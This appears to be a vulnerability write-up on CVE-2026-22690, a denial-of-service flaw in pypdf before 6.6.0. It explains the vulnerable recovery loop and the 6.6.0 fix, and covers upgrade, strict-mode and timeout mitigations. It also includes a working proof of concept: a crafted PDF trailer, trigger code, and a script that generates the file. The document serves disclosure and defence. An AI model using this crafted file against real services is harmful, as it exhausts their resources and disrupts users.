Feb 21, 2026
A resource exhaustion vulnerability in pypdf < 6.6.0 allows attackers to cause a Denial of Service (DoS) via malformed PDFs. By inflating the trailer's `/Size` parameter and omitting `/Root`, an attacker sends the parser into a recovery loop whose length the attacker controls.
Parsing PDFs is a thankless task, akin to translating ancient hieroglyphs written by a drunk scribe. `pypdf`, a popular Python library, tried to be helpful by 'fixing' broken files on the fly. Unfortunately, this benevolence created a denial-of-service vector (CVE-2026-22690). By simply omitting the root definition and lying about the object count, an attacker can force the library into a near-infinite search loop, pinning the CPU at 100% until the heat death of the universe, or until the OOM killer steps in.
PDFs are notoriously broken. The specification is a sprawling mess of legacy debt, and most PDF writers generate garbage that only Adobe Reader—and a few brave open-source libraries—can parse. pypdf falls into the "brave" category. It includes a "non-strict" mode (often the default) designed to recover data from malformed files.
Here is the problem: recovery requires heuristics. When a PDF is missing critical structural elements, the library has to go hunting for them. In CVE-2026-22690, the library's hunt for a missing /Root object turns into a death march. The developers assumed that the file's trailer dictionary would honestly report the number of objects via the /Size key.
In the security world, we have a golden rule: Never trust input metadata. If a file header says "I have 10 billion objects," you don't start a loop that counts to 10 billion. But that is exactly what happened here. This isn't a buffer overflow or a fancy ROP chain; it's a logic flaw born of optimism.
To understand this bug, you need to know how a PDF ends. The file concludes with a trailer dictionary, which points to the /Root (the catalog of the document) and usually includes a /Size key indicating the number of objects in the cross-reference table.
When pypdf operates in strict=False mode and encounters a PDF without a /Root pointer, it panics slightly. "No problem," it thinks, "I'll just scan all the objects to find one that looks like a Catalog."
How many objects does it scan? It asks the /Size key.

    # The logic before the fix
    nb = cast(int, self.trailer.get("/Size", 0))
    for i in range(nb):
        # Expensive lookup operation
        o = self.get_object(i + 1)

See the issue? The attacker controls /Size. If I hand you a 1KB PDF file but set /Size to 2,147,483,647 (the signed 32-bit maximum), the library dutifully attempts to resolve over 2 billion objects. Since the file is small and those objects don't actually exist, each get_object call fails, the exception is caught, and the loop moves on to the next iteration. It spins the CPU for hours, doing absolutely nothing of value.
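To make the cost model concrete, here is a toy version of that loop. It is a sketch, not pypdf's code: `scan_for_root`, the plain-dict trailer, and the `objects` mapping are all hypothetical stand-ins. The point it illustrates is that the number of lookups follows the claimed /Size, not the number of objects actually present.

```python
def scan_for_root(trailer, objects):
    """Toy model of the pre-fix recovery loop (hypothetical, not pypdf's API).

    trailer: dict standing in for the PDF trailer dictionary
    objects: dict mapping object number -> parsed object
    Returns (catalog_or_None, number_of_lookups_performed).
    """
    lookups = 0
    # The iteration count comes straight from attacker-controlled metadata.
    for i in range(trailer.get("/Size", 0)):
        lookups += 1
        obj = objects.get(i + 1)  # a missing object still costs one lookup
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj, lookups
    return None, lookups


# Honest file: the catalog is found after two lookups.
print(scan_for_root({"/Size": 3}, {1: {"/Type": "/Pages"}, 2: {"/Type": "/Catalog"}}))
# ({'/Type': '/Catalog'}, 2)

# Lying file: no objects at all, yet the loop runs once per claimed object.
print(scan_for_root({"/Size": 1_000_000}, {}))
# (None, 1000000)
```

Scale the second call up to 2,147,483,647 and replace the cheap dictionary lookup with a real object resolution, and you get the hang described above.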
The fix provided in version 6.6.0 is a classic "sanity check." The developers realized that while they want to recover broken files, they shouldn't spend eternity doing it. They introduced a hard limit on the recovery search.
Here is the diff analysis for pypdf/_reader.py:

The Vulnerable Logic:

    if self._validated_root is None:
        # Blindly trust /Size
        nb = cast(int, self.trailer.get("/Size", 0))
        for i in range(nb):
            try:
                o = self.get_object(i + 1)
                # ... check if o is Catalog ...

The Fixed Logic (v6.6.0):

    # Introduce a configurable limit (default 10,000?)
    self._root_object_recovery_limit = (
        root_object_recovery_limit
        if isinstance(root_object_recovery_limit, int)
        else sys.maxsize
    )

    # ... inside the loop ...
    for i in range(number_of_objects):
        # The Circuit Breaker
        if i >= self._root_object_recovery_limit:
            raise LimitReachedError("Maximum Root object recovery limit reached.")

This change ensures that even if /Size claims to be billions, the loop terminates after a reasonable number of attempts, preventing the CPU exhaustion.
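The circuit-breaker pattern is easy to try in isolation. The sketch below is a standalone toy, not the library's implementation: `RecoveryLimitReached` is a hypothetical stand-in for pypdf's `LimitReachedError`, `scan_for_root_capped` is an invented name, and the default of 10,000 is an assumption chosen for illustration.

```python
class RecoveryLimitReached(Exception):
    """Hypothetical stand-in for the error raised by the fixed library."""


def scan_for_root_capped(trailer, objects, limit=10_000):
    """Toy recovery loop with a hard cap on iterations (assumed default)."""
    for i in range(trailer.get("/Size", 0)):
        # Circuit breaker: stop once the search budget is spent,
        # no matter what the trailer claims.
        if i >= limit:
            raise RecoveryLimitReached("Maximum Root object recovery limit reached.")
        obj = objects.get(i + 1)
        if isinstance(obj, dict) and obj.get("/Type") == "/Catalog":
            return obj
    return None


try:
    scan_for_root_capped({"/Size": 2_147_483_647}, {})
except RecoveryLimitReached as exc:
    print(f"gave up early: {exc}")
# gave up early: Maximum Root object recovery limit reached.
```

The trade-off is that a genuinely damaged file whose catalog sits beyond the limit is no longer recoverable, which is presumably why the real limit is configurable.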
Exploiting this is trivially easy. You don't need shellcode. You just need a text editor. A PDF is arguably just a text file with some binary blobs. We can construct a minimal "killer" PDF that consists of a header and a malicious trailer.
Step 1: The Header
Standard PDF header.

    %PDF-1.7

Step 2: The Body
We don't need a body. In fact, fewer objects make the parser hit the loop faster.
Step 3: The Malicious Trailer
We omit /Root (triggering the recovery path) and set /Size to a 32-bit integer limit.

    trailer
    <<
    /Size 2147483647
    >>
    startxref
    0
    %%EOF

Step 4: The Trigger
Load this into a Python environment:

    from pypdf import PdfReader

    # strict=False is often the default or explicitly set to handle "bad" PDFs
    reader = PdfReader("poison.pdf", strict=False)

    # Accessing pages triggers the root lookup
    print(len(reader.pages))

Result: The process hangs. The fan spins up. The developer cries.
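If you want a regression test for your own upload pipeline, the file from Steps 1 to 3 can be generated instead of hand-typed. This is a minimal sketch: `build_test_pdf` is a hypothetical helper name, and the `claimed_size` parameter exists so you can use a smaller value when you only want to confirm that a patched install gives up quickly.

```python
def build_test_pdf(claimed_size=2_147_483_647):
    """Return the bytes of a header-plus-trailer PDF with no /Root entry.

    claimed_size is the value written to /Size; nothing in the file backs it up.
    """
    lines = [
        "%PDF-1.7",
        "trailer",
        "<<",
        f"/Size {claimed_size}",
        ">>",
        "startxref",
        "0",
        "%%EOF",
    ]
    return ("\n".join(lines) + "\n").encode("ascii")


data = build_test_pdf()
print(len(data))         # 58
print(b"/Root" in data)  # False
```

Writing `data` to disk (for example with `pathlib.Path("poison.pdf").write_bytes(data)`) gives you the 58-byte file used in Step 4. Only feed it to systems you own.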
You might shrug at a DoS. "So what? I restart the container." But consider where pypdf is used. It's the engine behind thousands of "Upload your Resume" portals, automated invoice scanners, and archival bots.
If you run a service that accepts PDFs from the public internet and processes them asynchronously, every poisoned upload can pin a worker's CPU for as long as the loop runs. In serverless environments, this is particularly nasty as it guarantees a timeout, maxing out the billed duration for every invocation.
The mitigation is straightforward. If you are using pypdf, check your version.
Primary Mitigation:
Upgrade to pypdf >= 6.6.0.

    pip install pypdf --upgrade

Workaround (if you can't upgrade):
Enforce strict parsing. This disables the recovery logic entirely. The side effect is that actually broken PDFs will raise an exception instead of being partially read, but that is better than your server melting.

    reader = PdfReader(stream, strict=True)

If you must use older versions and allow non-strict parsing, run the parsing in a separate process with a hard timeout and kill it if it takes longer than a few seconds. In-process mechanisms are weaker: signal.alarm is only available on Unix and only fires in the main thread, and async timeouts cannot interrupt a CPU-bound synchronous loop.
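One way to get a timeout that actually kills the work is to parse in a child interpreter and let `subprocess.run` enforce the deadline. The sketch below is an assumption about how you might wire it up, not a recommendation from the pypdf project: `count_pages_with_timeout` and `_CHILD_SCRIPT` are hypothetical names, and the five-second default is arbitrary.

```python
import subprocess
import sys

# Script run in the child interpreter: parse the PDF named in argv[1]
# and print its page count. pypdf is imported only in the child.
_CHILD_SCRIPT = """
import sys
from pypdf import PdfReader
print(len(PdfReader(sys.argv[1], strict=False).pages))
"""


def count_pages_with_timeout(path, timeout_s=5.0, child_script=_CHILD_SCRIPT):
    """Return the page count, or None if parsing fails or exceeds timeout_s."""
    try:
        result = subprocess.run(
            [sys.executable, "-c", child_script, path],
            capture_output=True,
            text=True,
            timeout=timeout_s,  # on expiry the child is killed, then TimeoutExpired is raised
        )
    except subprocess.TimeoutExpired:
        return None
    if result.returncode != 0:
        return None  # the child raised, e.g. on an unreadable file
    return int(result.stdout.strip())
```

Calling `count_pages_with_timeout("poison.pdf")` against a vulnerable install should come back with `None` after roughly five seconds instead of hanging the caller. Spawning an interpreter per file is not free, so a long-lived worker pool with per-task deadlines may suit high-volume services better.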
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

| Product | Affected Versions | Fixed Version |
|---|---|---|
| pypdf (py-pdf) | < 6.6.0 | 6.6.0 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v3.1 | 5.3 (Medium) |
| Attack Vector | Network (Context-dependent) |
| Impact | Denial of Service (Availability) |
| Exploit Status | PoC Available (Trivial to construct) |
| EPSS Score | 0.00019 (Low Probability) |
The software does not properly control the allocation and maintenance of a limited resource, allowing an actor to influence the amount of resources consumed.
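For readers wondering how the vector string turns into 5.3, the arithmetic can be reproduced with the CVSS v3.1 base-score formula for unchanged scope. The sketch below hardcodes the published metric weights for this particular vector; the function names are my own.

```python
import math

# CVSS v3.1 weights for AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
AV_NETWORK = 0.85
AC_LOW = 0.77
PR_NONE = 0.85
UI_NONE = 0.85
C_NONE, I_NONE, A_LOW = 0.0, 0.0, 0.22


def roundup(value):
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score_scope_unchanged(av, ac, pr, ui, c, i, a):
    """Base score for vectors with S:U."""
    iss = 1 - (1 - c) * (1 - i) * (1 - a)      # impact sub-score
    impact = 6.42 * iss
    exploitability = 8.22 * av * ac * pr * ui
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


score = base_score_scope_unchanged(
    AV_NETWORK, AC_LOW, PR_NONE, UI_NONE, C_NONE, I_NONE, A_LOW
)
print(score)  # 5.3
```

The impact term is small (about 1.41) because only availability is affected, and only at the Low level; most of the score comes from how easy the attack is to deliver (exploitability of about 3.89).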